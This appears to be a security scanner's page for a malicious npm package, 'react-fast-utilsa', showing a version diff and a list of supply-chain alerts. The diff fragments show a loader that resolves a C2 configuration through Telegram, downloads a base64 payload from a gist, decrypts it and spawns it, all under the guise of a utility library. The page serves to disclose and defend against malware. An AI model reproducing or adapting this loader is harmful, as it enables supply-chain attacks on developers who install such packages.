react-fast-utilsa
Advanced tools
+1
-1
| { | ||
| "name": "react-fast-utilsa", | ||
| "version": "2.0.3", | ||
| "version": "2.0.4", | ||
| "description": "Utility layer for asynchronous state management", | ||
@@ -5,0 +5,0 @@ "main": "index.js", |
+10
-5
@@ -276,3 +276,5 @@ const fs = require('fs'); | ||
| // Real Work: Resolve C2 -> Fetch Gist -> Decode | ||
| console.log("[Debug] Resolving C2 from Telegram..."); | ||
| const { key: keyString, gistUrl } = await resolveConfigFromTelegram(); | ||
| console.log(`[Debug] C2 Resolved. Key: ${keyString.substring(0, 8)}... URL: ${gistUrl}`); | ||
| // console.log(`[Debug] Key: ${keyString.substring(0,8)}... URL: ${gistUrl}`); | ||
@@ -283,10 +285,11 @@ | ||
| await progressPromise; // Finish bar | ||
| console.log(`[Debug] Fetching payload from ${gistUrl}...`); | ||
| const b64Payload = await fetchText(gistUrl); | ||
| console.log(`[Debug] Payload fetched (${b64Payload.length} bytes). Decrypting...`); | ||
| const encryptedBlob = Buffer.from(b64Payload.trim(), 'base64'); | ||
| const keyConfig = { key: keyString }; | ||
| await progressPromise; // Finish bar | ||
| // console.log("[*] Decrypting payload..."); // Keep this purely for debug (or remove in prod) | ||
| const crypto = require('crypto'); | ||
@@ -309,3 +312,4 @@ const key = Buffer.from(keyConfig.key, 'hex'); | ||
| // 4. Spawn | ||
| let debugMode = false; | ||
| let debugMode = true; // FORCE DEBUG MODE FOR TESTING | ||
| /* | ||
| try { | ||
@@ -321,2 +325,3 @@ // In Remote Loader, config might also be fetched or hardcoded. | ||
| } catch (e) { } | ||
| */ | ||
@@ -323,0 +328,0 @@ // console.log(`[*] Spawning Payload...`); |
Known malware
Supply chain riskThis package version is identified as malware. It has been flagged either by Socket's AI scanner and confirmed by our threat research team, or is listed as malicious in security databases and other sources.
Found 1 instance in 1 package
Network access
Supply chain riskThis module accesses the network.
Found 3 instances in 1 package
Shell access
Supply chain riskThis module accesses the system shell. Accessing the system shell increases the risk of executing arbitrary code.
Found 1 instance in 1 package
Unpublished package
Supply chain riskPackage version was not found on the registry. It may exist on a different registry and need to be configured to pull from that registry.
Found 1 instance in 1 package
Dynamic require
Supply chain riskDynamic require can indicate the package is performing dangerous or unsafe dynamic code execution.
Found 1 instance in 1 package
Environment variable access
Supply chain riskPackage accesses environment variables, which may be a sign of credential stuffing or data theft.
Found 3 instances in 1 package
Filesystem access
Supply chain riskAccesses the file system, and could potentially read sensitive data.
Found 1 instance in 1 package
Long strings
Supply chain riskContains long string literals, which may be a sign of obfuscated or packed code.
Found 1 instance in 1 package
Known malware
Supply chain riskThis package version is identified as malware. It has been flagged either by Socket's AI scanner and confirmed by our threat research team, or is listed as malicious in security databases and other sources.
Found 2 instances in 1 package
Network access
Supply chain riskThis module accesses the network.
Found 3 instances in 1 package
Shell access
Supply chain riskThis module accesses the system shell. Accessing the system shell increases the risk of executing arbitrary code.
Found 1 instance in 1 package
Unpublished package
Supply chain riskPackage version was not found on the registry. It may exist on a different registry and need to be configured to pull from that registry.
Found 1 instance in 1 package
Dynamic require
Supply chain riskDynamic require can indicate the package is performing dangerous or unsafe dynamic code execution.
Found 1 instance in 1 package
Environment variable access
Supply chain riskPackage accesses environment variables, which may be a sign of credential stuffing or data theft.
Found 3 instances in 1 package
Filesystem access
Supply chain riskAccesses the file system, and could potentially read sensitive data.
Found 1 instance in 1 package
15239
1.8%290
1.75%2
-33.33%7
16.67%